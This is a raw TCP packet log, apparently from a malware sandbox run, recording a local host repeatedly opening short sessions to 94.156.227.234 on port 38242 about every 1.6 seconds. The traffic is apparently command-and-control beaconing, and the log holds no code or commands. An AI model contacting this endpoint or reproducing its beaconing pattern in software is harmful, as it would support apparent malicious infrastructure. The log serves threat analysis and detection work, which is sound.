                                                                                                    Dec 24, 2024 06:28:06.700834036 CET6004438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:06.820723057 CET382426004494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:06.820807934 CET6004438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:06.820861101 CET6004438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:06.940785885 CET382426004494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:07.327177048 CET6004438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:07.489164114 CET382426004494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:07.956512928 CET382426004494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:07.956595898 CET6004438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:08.328272104 CET6004638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:08.449242115 CET382426004694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:08.449337006 CET6004638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:08.449337006 CET6004638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:08.569181919 CET382426004694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:08.953078032 CET6004638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:09.113159895 CET382426004694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:09.567251921 CET382426004694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:09.567326069 CET6004638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:09.954155922 CET6004838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:10.073853970 CET382426004894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:10.073977947 CET6004838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:10.074058056 CET6004838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:10.193846941 CET382426004894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:10.578926086 CET6004838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:10.741228104 CET382426004894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:11.192557096 CET43928443192.168.2.2391.189.91.42
                                                                                                    Dec 24, 2024 06:28:11.201646090 CET382426004894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:11.201740980 CET6004838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:11.579972029 CET6005038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:11.699815989 CET382426005094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:11.699914932 CET6005038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:11.699995041 CET6005038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:11.819626093 CET382426005094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:12.204499006 CET6005038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:12.369241953 CET382426005094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:12.828454971 CET382426005094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:12.828577042 CET6005038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:13.205540895 CET6005238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:13.325562954 CET382426005294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:13.325659990 CET6005238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:13.325702906 CET6005238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:13.445611000 CET382426005294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:13.829786062 CET6005238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:13.997092009 CET382426005294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:14.460300922 CET382426005294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:14.460385084 CET6005238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:14.830955982 CET6005438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:14.950815916 CET382426005494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:14.950900078 CET6005438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:14.950932980 CET6005438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:15.070533037 CET382426005494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:15.455876112 CET6005438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:15.617227077 CET382426005494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:16.085764885 CET382426005494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:16.085841894 CET6005438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:16.457082987 CET6005638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:16.576800108 CET382426005694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:16.576920033 CET6005638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:16.576973915 CET6005638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:16.696814060 CET382426005694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:17.080971956 CET6005638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:17.241005898 CET382426005694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:17.721396923 CET382426005694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:17.721488953 CET6005638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:18.082027912 CET6005838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:18.201894045 CET382426005894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:18.201970100 CET6005838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:18.202044010 CET6005838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:18.321875095 CET382426005894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:18.706762075 CET6005838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:18.869122982 CET382426005894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:19.323579073 CET382426005894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:19.323656082 CET6005838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:19.708163023 CET6006038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:19.828142881 CET382426006094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:19.828315973 CET6006038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:19.828316927 CET6006038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:19.947978020 CET382426006094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:20.333837032 CET6006038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:20.497085094 CET382426006094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:20.962548018 CET382426006094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:20.962651014 CET6006038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:21.334852934 CET6006238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:21.430989027 CET42836443192.168.2.2391.189.91.43
                                                                                                    Dec 24, 2024 06:28:21.454766035 CET382426006294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:21.454860926 CET6006238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:21.454941034 CET6006238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:21.574552059 CET382426006294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:21.958343029 CET6006238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:22.125129938 CET382426006294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:22.584803104 CET382426006294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:22.584894896 CET6006238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:22.959439993 CET6006438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:23.079310894 CET382426006494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:23.079545021 CET6006438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:23.079545021 CET6006438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:23.199362993 CET382426006494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:23.583600044 CET6006438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:23.744973898 CET382426006494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:24.201153994 CET382426006494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:24.201484919 CET6006438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:24.584527016 CET6006638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:24.705065012 CET382426006694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:24.705179930 CET6006638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:24.705179930 CET6006638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:24.825124025 CET382426006694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:25.209089994 CET6006638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:25.372948885 CET382426006694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:25.833457947 CET382426006694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:25.833623886 CET6006638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:26.209894896 CET6006838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:26.329646111 CET382426006894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:26.329736948 CET6006838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:26.329737902 CET6006838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:26.449532986 CET382426006894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:26.833635092 CET6006838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:26.996961117 CET382426006894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:27.451545954 CET382426006894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:27.451647043 CET6006838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:27.574107885 CET4251680192.168.2.23109.202.202.202
                                                                                                    Dec 24, 2024 06:28:27.834521055 CET6007038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:27.954194069 CET382426007094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:27.954281092 CET6007038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:27.954313993 CET6007038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:28.073983908 CET382426007094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:28.457989931 CET6007038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:28.620980024 CET382426007094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:29.074768066 CET382426007094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:29.074837923 CET6007038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:29.459491014 CET6007238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:29.579372883 CET382426007294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:29.579468966 CET6007238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:29.579554081 CET6007238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:29.699393988 CET382426007294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:30.084167957 CET6007238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:30.245099068 CET382426007294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:30.705495119 CET382426007294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:30.705595016 CET6007238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:31.085351944 CET6007438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:31.205167055 CET382426007494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:31.205280066 CET6007438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:31.205380917 CET6007438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:31.325050116 CET382426007494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:31.710314035 CET6007438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:31.877017975 CET382426007494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:32.334300041 CET382426007494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:32.334383965 CET6007438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:32.711415052 CET6007638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:32.831191063 CET382426007694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:32.831262112 CET6007638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:32.831289053 CET6007638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:32.950948954 CET382426007694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:33.335804939 CET6007638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:33.500932932 CET382426007694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:33.950290918 CET382426007694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:33.950436115 CET6007638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:34.337485075 CET6007838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:34.457246065 CET382426007894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:34.457393885 CET6007838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:34.457437992 CET6007838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:34.577064991 CET382426007894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:34.962212086 CET6007838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:35.125293016 CET382426007894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:35.586545944 CET382426007894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:35.586659908 CET6007838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:35.963747025 CET6008038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:36.083554029 CET382426008094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:36.083703041 CET6008038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:36.083852053 CET6008038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:36.203609943 CET382426008094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:36.590141058 CET6008038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:36.752928972 CET382426008094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:37.206624031 CET382426008094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:37.206708908 CET6008038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:37.591639996 CET6008238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:37.711340904 CET382426008294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:37.711425066 CET6008238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:37.711445093 CET6008238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:37.831255913 CET382426008294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:38.218193054 CET6008238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:38.384944916 CET382426008294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:38.838051081 CET382426008294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:38.838288069 CET6008238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:39.220309973 CET6008438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:39.340337992 CET382426008494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:39.340636969 CET6008438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:39.340636969 CET6008438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:39.460527897 CET382426008494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:39.846971989 CET6008438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:40.012912035 CET382426008494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:40.465802908 CET382426008494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:40.466037035 CET6008438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:40.848869085 CET6008638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:40.968724966 CET382426008694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:40.968882084 CET6008638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:40.968924046 CET6008638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:41.088787079 CET382426008694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:41.475231886 CET6008638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:41.637166977 CET382426008694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:42.099337101 CET382426008694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:42.099675894 CET6008638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:42.477164030 CET6008838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:42.597065926 CET382426008894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:42.597304106 CET6008838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:42.597541094 CET6008838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:42.717128992 CET382426008894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:43.104399920 CET6008838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:43.268852949 CET382426008894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:43.724843979 CET382426008894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:43.725250006 CET6008838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:44.106801987 CET6009038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:44.226658106 CET382426009094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:44.226910114 CET6009038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:44.227109909 CET6009038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:44.346651077 CET382426009094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:44.736536980 CET6009038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:44.899533033 CET382426009094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:45.348170042 CET382426009094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:45.348387957 CET6009038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:45.739315033 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:45.859055042 CET382426009294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:45.859283924 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:45.859302044 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:45.978884935 CET382426009294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:46.368556023 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:46.739552975 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:46.859247923 CET382426009294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:46.981220961 CET382426009294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:46.981560946 CET6009238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:47.371097088 CET6009438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:47.619590044 CET382426009494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:47.619838953 CET6009438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:47.619839907 CET6009438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:47.739520073 CET382426009494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:48.126776934 CET6009438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:48.292789936 CET382426009494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:48.742077112 CET382426009494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:48.742376089 CET6009438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:49.129420996 CET6009638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:49.249279022 CET382426009694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:49.249425888 CET6009638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:49.249515057 CET6009638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:49.369129896 CET382426009694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:49.755625963 CET6009638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:49.916852951 CET382426009694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:50.383732080 CET382426009694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:50.383881092 CET6009638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:50.757776976 CET6009838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:50.877609968 CET382426009894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:50.877926111 CET6009838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:50.878020048 CET6009838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:50.997695923 CET382426009894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:51.386188030 CET6009838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:51.552854061 CET382426009894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:52.003659964 CET382426009894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:52.003870010 CET6009838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:52.146692038 CET43928443192.168.2.2391.189.91.42
                                                                                                    Dec 24, 2024 06:28:52.388312101 CET6010038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:52.714653015 CET382426010094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:52.714905977 CET6010038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:52.715095043 CET6010038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:52.834734917 CET382426010094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:53.222532034 CET6010038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:53.384907961 CET382426010094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:53.841459036 CET382426010094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:53.841785908 CET6010038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:54.224658966 CET6010238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:54.344985962 CET382426010294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:54.345252991 CET6010238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:54.345366955 CET6010238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:54.465018034 CET382426010294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:54.853334904 CET6010238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:55.016751051 CET382426010294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:55.490472078 CET382426010294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:55.490739107 CET6010238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:55.855598927 CET6010438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:55.975285053 CET382426010494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:55.975461006 CET6010438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:55.975562096 CET6010438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:56.095402956 CET382426010494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:56.483480930 CET6010438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:56.644886017 CET382426010494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:57.098792076 CET382426010494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:57.099137068 CET6010438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:57.485996008 CET6010638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:57.605735064 CET382426010694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:57.606004000 CET6010638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:57.606004000 CET6010638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:57.725759983 CET382426010694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:58.112411022 CET6010638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:58.276700020 CET382426010694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:58.732474089 CET382426010694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:58.732780933 CET6010638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:59.117079973 CET6010838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:59.237395048 CET382426010894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:59.237575054 CET6010838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:59.237741947 CET6010838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:59.357332945 CET382426010894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:59.747818947 CET6010838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:59.912812948 CET382426010894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:00.374380112 CET382426010894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:00.374809980 CET6010838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:00.750906944 CET6011038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:00.871115923 CET382426011094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:00.871453047 CET6011038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:00.871454000 CET6011038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:00.991558075 CET382426011094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:01.378535986 CET6011038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:01.540891886 CET382426011094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:01.992978096 CET382426011094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:01.993256092 CET6011038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:02.380882025 CET6011238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:02.500612974 CET382426011294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:29:02.500874043 CET6011238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:29:02.500874043 CET6011238242192.168.2.2394.156.227.234
